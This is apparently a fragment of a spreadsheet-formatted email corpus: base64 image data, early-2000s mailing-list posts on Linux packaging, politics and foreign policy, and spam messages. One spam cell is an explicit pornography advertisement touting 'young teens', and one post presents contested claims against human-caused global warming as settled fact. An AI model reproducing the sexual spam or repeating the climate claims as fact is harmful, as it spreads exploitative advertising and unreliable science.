 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
 ------=_NextPart_000_000F_01C23362.3939B510
 Content-Type: image/gif;
 	name="nothing.gif"
 Content-Transfer-Encoding: base64
 Content-Location: http://news.bbc.co.uk/furniture/nothing.gif
 R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==
 ------=_NextPart_000_000F_01C23362.3939B510
 Content-Type: image/gif;
 	name="grey_pixel.gif"
 Content-Transfer-Encoding: base64
 Content-Location: http://news.bbc.co.uk/furniture/grey_pixel.gif
 R0lGODlhAQABAIAAAJmZmQAAACwAAAAAAQABAAACAkQBADs=
 ------=_NextPart_000_000F_01C23362.3939B510
 Content-Type: image/gif;
 	name="startquote.gif"
 Content-Transfer-Encoding: base64
 Content-Location: http://news.bbc.co.uk/nol/shared/img/startquote.gif
 R0lGODlhFwASAKL/AMvLmNXVouLir/Dwvf//zPn5x///zv//0CwAAAAAFwASAEADg0iqViErrvFM
 ACCMTQxzmLAV0iAEzyA1JyoUniJksNSBUExcWI8NBsPA5wuQbjONbtG4vDw4G2MIAEp4xMCU2BMI
 ubTYjAsphaSsjEpRSNZW0di3uoy4l2PBIWgbD/Y6WD1GHnNEZYI+QIZZbWB0TWBGBGM+ZWyVGEoM
 BAUkdZyeHQoJADs=
 ------=_NextPart_000_000F_01C23362.3939B510
 Content-Type: image/gif;
 	name="endquote.gif"
 Content-Transfer-Encoding: base64
 Content-Location: http://news.bbc.co.uk/nol/shared/img/endquote.gif
 R0lGODlhFwASAKL/AMvLmNXVouLir/DwvcDAwPn5xwAAAAAAACH5BAEAAAQALAAAAAAXABIAQANm
 SLrczgLICcYqgcpARhaPElUNpm3LcEogY7aPSnYZBYsnaK5WtwKchuzWGN0iwcfLIQg4iYpBMyDo
 EUYa2E4z2HKjPw72q6hpkoWBFCVU15IpiZUJLBSBIcISgg95AERNc0wBdg0JADsAW2c9MFMLYpNc
 iieceQFtjSyUKwkAOw==
 ------=_NextPart_000_000F_01C23362.3939B510--
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Hesty wrote :
 &gt; I know they're all included in the freshrpms alsa-null
 &gt; directory.
 Now that Psyche is released, that directory was erased.
 &gt; I was worried that with the new mplayer-pre8, these
 &gt; packages might break something. Is there any mplayer
 &gt; package which includes all the options for -vo and
 &gt; -ao? Is that because alsa is not included in RH, hence
 &gt; the lack of alsa option for mplayer from freshrpms?
 &gt; Or is there some swtiches to enable these options
 &gt; during 
 &gt; rpm build?
 For all my recent packages that support --with and --without options, I've
 put them in the %description section. See for instance :
 http://psyche.freshrpms.net/rpm.html?id=80
 Where you can see :
 Available rpmbuild rebuild options :
 --with : alsa
 --without : aalib lirc libdv arts
 The ogle package has also a --with alsa option, and I've had a bug report
 about xine that I apparently unintentionally compiled with ALSA directly
 :-/
 I'd like to aks this on the rpm-zzzlist : Would a new dependency of 250k, the
 alsa-lib package, for many packages (mplayer, ogle, xine) be a problem for
 the freshrpms.net packages users? As I really feel like blending ALSA in
 now, especially since I've just spent some time recompiling alsa-kernel
 package for all the Psyche kernels!!!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</si>
  <si>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meant "gubernatorial PRIMARY."
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Geege
 Schuman
 Sent: Wednesday, September 11, 2002 9:32 PM
 To: Tom; fork@spamassassin.taint.org
 Subject: RE: Bush blew take two
 yeshterday we f*cked up our gubernatorial election, too.  results to be
 contested by reno.  same six districts that were sued in 2000 still came up
 gimpy.
 i suggested to jeb via e-mail we hold a run-off pinata party.  hoist up a
 papier mache donkey and a papier mache elephant.  first one to batted open
 wins.
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Tom
 Sent: Wednesday, September 11, 2002 9:16 PM
 To: fork@spamassassin.taint.org
 Subject: Bush blew take two
 http://www.washingtonpost.com/wp-dyn/articles/A63543-2002Sep10.html
 "MIAMI, Sept. 10 -- A two-gram rock of crack
 cocaine was found inside the shoe of Florida
 Gov. Jeb Bush's 25-year-old daughter by workers
 at the central Florida rehabilitation center
 where she is undergoing court-ordered drug
 treatment, Orlando police said today.
 Noelle Bush was not arrested because witnesses
 would not give sworn statements, but the
 incident is under investigation, according to
 Orlando police spokesman Orlando Rolon."
 Wow, the witnesses would not nark of a Bush girl in an era where there are
 no mare restrictions on being held without a cause?
 Imagine that...
 -tom
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: DNA match brings breakthrough
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8723992,215/
 Date: 2002-10-10T03:26:59+01:00
 New evidence in case of murdered British tourist Peter Falconio.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "L" == Luis Villa &lt;louie@ximian.com&gt; writes:
     L&gt; ... So, yeah, it's a new attack, but it's not nearly as
     L&gt; devastating an MS critique as the author wants us to believe
 Good to know ... not being an MS user, I have no means to evaluate
 these things so it's best to get a second opinion ;)
 Besides, I shudder to think of the pandemonium that would ensue if we
 had to /deploy/ the present states of Lycoris or Lindows in it's
 stead!  As the Big Joe Williams song goes, "Next week, sometime, but
 no, not now."
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">"the historical record", by which you mean *human* historical record, is
 highly overrated (nigh worthless) when you are talking about geological
 timescales, even on topics with as short a timescale as climate.
 My problem with global warming (or cooling for that matter), is that the
 supposedly profound recent changes in temperature, both in absolute
 terms and as a function time, very arguably fall well below the noise
 floor of the natural fluctuations that have occurred over the last
 50,000 years both in terms of absolute average temperature and the rate
 of temperature change.  People unfamiliar with history of global
 temperature since the advent of modern humans may think that a degree
 here or there over a century is a lot, not realizing that global
 temperatures regularly whipsaw with far greater extremity.  I therefore 
 immediately dismiss any theory of global warming that cannot explain why
 temperatures whipsawed more severely in pre-history than in the last
 couple thousand years (which have been relatively calm by geological
 standards).  This is a very inconvenient fact for people trying to use
 climate to push a particular social agenda.
 It is worth noting that underneath the receding glaciers deposited
 during the last major ice age, they are finding substantial evidence of
 humans living in what was a nice temperate climate before the glaciers
 paved over their civilization.  The receding glaciers have turned into a
 bit of an archaeological treasure chest, as they expose artifacts buried
 in and underneath them as they shrink that have been preserved by the
 ice for thousands of years.  I don't see any compelling reason to "save
 the glaciers" anyway, particularly in light of the fact that their
 existence has always been transient.
 For anyone to insist that the current negligible fluctuations are
 anthropogenic just heaps one ridiculous assertion upon another.  I'll
 just stick with Occam's Razor for now.
 In my humble opinion.
 Cheers,
 -James Rogers
  jamesr@best.com
 On Mon, 2002-09-23 at 12:23, Jim Whitehead wrote:
 &gt; 
 &gt; For anyone to fully bury global warming, they would need to explain why the
 &gt; dramatic increase in CO2 concentrations are not increasing the global
 &gt; temperature. They would also need to explain why, worldwide, glaciers are
 &gt; melting faster than they have previously in the historical record. That is,
 &gt; people need more than refutations, they need a compelling alternate
 &gt; explanation (hint: climate variability doesn't cover all the bases).
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Jul 19, 2002 at 08:48:40PM +0100, Ronan Cunniffe wrote:
 &gt; Quoting Ronan Waide &lt;waider@waider.ie&gt;:
 &gt; 
 &gt; &gt; Sure, but soft links would do the same. To be honest, I'm trying to
 &gt; &gt; think of a useful use of hard links right now, and I'm a little
 &gt; &gt; stumped. There's gotta be some benefit that I'm missing that's
 &gt; &gt; immediately obvious to everyone.
 &gt; 
 &gt; Using Niall's example - single set of files but &gt;1 namespace, and suppose that
 &gt; you want to delete some items from the set according to rules applied to the
 &gt; namespaces.  With soft links you need an *extra* namespace the others refer to,
 &gt; and after filtering the namespaces, you have to do a manual reference count to
 &gt; decide what goes and what stays.  With hard links, you just unlink and deletion
 &gt; is automatic.
 Couldn't have put it better myself, but that's not going to stop me trying :-) 
 The above situation occurs precisely because of the major functional difference
 between symbolic links (AKA soft links, or symlinks to their friends) and hard
 links. Two hard links to the same file are exactly equivalent - one is no more
 the files "real" directory entry than is the other. OTOH a symlink is a special
 thing which is a link to a real file, and when the file linked to is erased, you
 end up with a broken symbolic link - you can't have a broken hard link (except
 of course in the case of a banjaxed filesystem).
 Niall
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Kissinger
</t>
  </si>
  <si>
    <t xml:space="preserve">
 [can't think of how I'd be running
 afoul of the spam filters with this
 post, so here's the second try...]
 Kissinger's book _Does America Need
 a Foreign Policy?_ provides a few
 handy abstractions:
 &gt; The ultimate dilemma of the statesman is to strike a balance between
 &gt; values ["idealism"] and interests ["realism"] and, occasionally,
 &gt; between peace and justice.
 Also, he views historical American
 approaches to foreign policy as a
 bundle of three fibers:
 Hamiltonian - We should only get
   involved in foreign adventures
   to preserve balances of power.
 Wilsonian - We should only get
   involved in foreign adventures
   to further democracy, etc.
 Jacksonian - We should never get
   involved in foreign adventures.
   Unless we're attacked.  Then we
   go Rambo.
 He has tactfully left out the hard
 realists*; as for the rest I gather
 wilsonians play the idealists, and
 hamiltonians act where values and
 interests intersect, and jacksonians 
 act only when values and interests
 overlap.
 Kissinger himself seems to be a
 Hamiltonian; much of the book is
 about how he thinks we ought to
 be shaping the balance of power
 in various foreign regions.
 Maybe I've been too affected by
 Kant, but I can't see that such
 a strategy works unless one can
 count on a Bismarck runnning it:
 how lopsided does the US look if
 everyone tries to run a balance
 of power politics?
 - -Dave
 *
 &gt; The road to empire leads to domestic decay because, in time, the claims
 &gt; of omnipotence erode domestic restraints.  No empire has avoided the
 &gt; road to Caesarism unless, like the British Empire, it devolved its
 &gt; power before this process could develop.  In long-lasting empires,
 &gt; every problem turns into a domestic issue [which should be handled
 &gt; very differently from international ones] because the outside world
 &gt; no longer provides a counterweight.  And as challenges grow more
 &gt; diffuse and increasingly remote from the historic domestic base,
 &gt; internal struggles become ever more bitter and in time violent.
 &gt; A deliberate quest for hegemony is the surest way to destroy the
 &gt; values that made the United States great.
 Kings and tyrants generically have
 followed the same power politics:
 garner popular support by keeping
 potential oligarchs down.  In other
 traditions, a king is a legitimate
 tyrant, and a tyrant an illegitimate
 king.  In the US, I'd hope that we,
 like Samuel, wouldn't naturally make
 such fine distinctions.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Call me                    95508
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I missed you                         24632
</t>
  </si>
  <si>
    <t xml:space="preserve">
   If Amateurs is what you want,  Then we Have them.
 Take a look at these HARDCORE sites.  Young HOTTT TEENS !!!
 These are The BEST of the BEST when it comes to Amateurs.
 Don't believe me?   Take a look for yourself.  
   Amateur Petite
 -----------------------
 All Natural TIGHT Coeds !!!
 Petite Natural Breasted Amateurs!!
 Exclusive Amateur XXX Videos !!!
 Hundreds of Exclusive PETITE Amateur MODELS !!
  Click Here to Check Out the ACTION!!!!
  http://tour2.amateurpetite.com/?1087
  http://tour2.amateurpetite.com/?1087
   Ample Amateurs
 -------------------
 Breasts. Women have them, men love them. And for some men (and women!) that old adage
 "The Bigger The Better" holds true! And you'll find PLENTY to hold on to here - Our stable of stacked
 EXCLUSIVE AMPLE AMATEURS will make your mouth water and your hands tired just looking at them!
  http://tour2.ampleamateurs.com/?1087
  http://tour2.ampleamateurs.com/?1087
   Amateur Smut
 ------------------
  The Smuttiest XXX Amateurs on the Web !!!
  Real Amateurs in Explicit Photo Shoots
  1,000's of HIGH Quality Smut Pics !!!
  Pics of "The Horny Girl Next Door"
  Nasty Amateurs Gone WILD!!!
  http://tour1.amateursmut.com/?1087
  http://tour1.amateursmut.com/?1087
 -------------------------------------------------------------
 To be taken off this mailing list, simply hit your
 reply button and put "Remove" anywhere in the subject.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tuesday, July 23, 2002, at 03:49 PM, Luis Villa wrote:
 &gt; It's quite a bit more than natural selection; the times had a
 &gt; fascinating article a few months back (possibly posted as bits here)
 &gt; that note that one Holstein bull who died in the 70s is paternally
 &gt; related to something like 40% of the world's cattle. That's way, way
 &gt; more than natural selection, and (given the difficulty and expense of
 &gt; isolating specific genes for size, industrial-living-ness, etc.) more
 &gt; expansive than raw gene manipulation will be for some time.
 http://www.absglobal.com/
 They know bull semen, and the burger you ate at lunch may have had its 
 sire's contribution to its genetics purchased through them.
 My ex-wife worked in their lab for a year while I was in gradual school. 
 We had boxes of masking tape from ABS pre-printed with the names and 
 serial numbers of 'decomissioned' bulls.
 They are also known for the hideous puns on their sign just outside of 
 Madison on I90/94. But the puns haven't been any good since the secretary 
 who first wrote them retired.
 ----
 Bill Humphries &lt;bill@whump.com&gt;
 http://www.whump.com/moreLikeThis/
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Friend,  Meet over 1 million singles at Date.com
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=(0022)http://internet.e-mail --&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=windows-1252"&gt;
 &lt;META content="Microsoft FrontPage 5.0" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;CENTER&gt;
 &lt;TABLE cellSpacing=0 cellPadding=2 bgColor=#000000 background="" border=0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD vAlign=center align=middle&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=700 bgColor=#c51418 background="" 
       border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD vAlign=center align=middle width=700 colSpan=3&gt;&lt;A 
             href="http://click.mm53.com/sp/t.pl?id=3270:7552100"&gt;&lt;FONT 
             face="Arial Black, arial" color=#ffffff size=5&gt;MEET OTHER SINGLES 
             JUST LIKE YOU&lt;/FONT&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top align=middle width=186&gt;&lt;A 
             href="http://click.mm53.com/sp/t.pl?id=3271:7552100"&gt;&lt;IMG 
             height=12 src="http://www.date.com/newsletter/image/ad_1.gif" width=113 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
           &lt;TD width=328&gt;&lt;FONT size=-2&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width=186&gt;&lt;FONT size=-2&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top align=middle width=186 bgColor=white&gt;&lt;A 
             href="http://click.mm53.com/sp/t.pl?id=3272:7552100"&gt;&lt;IMG 
             height=90 src="http://www.date.com/newsletter/image/ad_2.gif" width=113 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
           &lt;TD vAlign=center align=left width=328 bgColor=#ffffff&gt;&lt;A 
             href="http://click.mm53.com/sp/t.pl?id=3273:7552100"&gt;&lt;FONT 
             face="Arial Black, Arial" color=#c51418 size=3&gt;Tired of searching 
             for love in all the wrong places?&lt;BR&gt;Find love now, the easy 
             way.&lt;/FONT&gt;&lt;/A&gt;&lt;/TD&gt;
           &lt;TD vAlign=center align=middle width=186 bgColor=#ffffff&gt;&lt;A 
             href="http://click.mm53.com/sp/t.pl?id=3274:7552100"&gt;&lt;IMG 
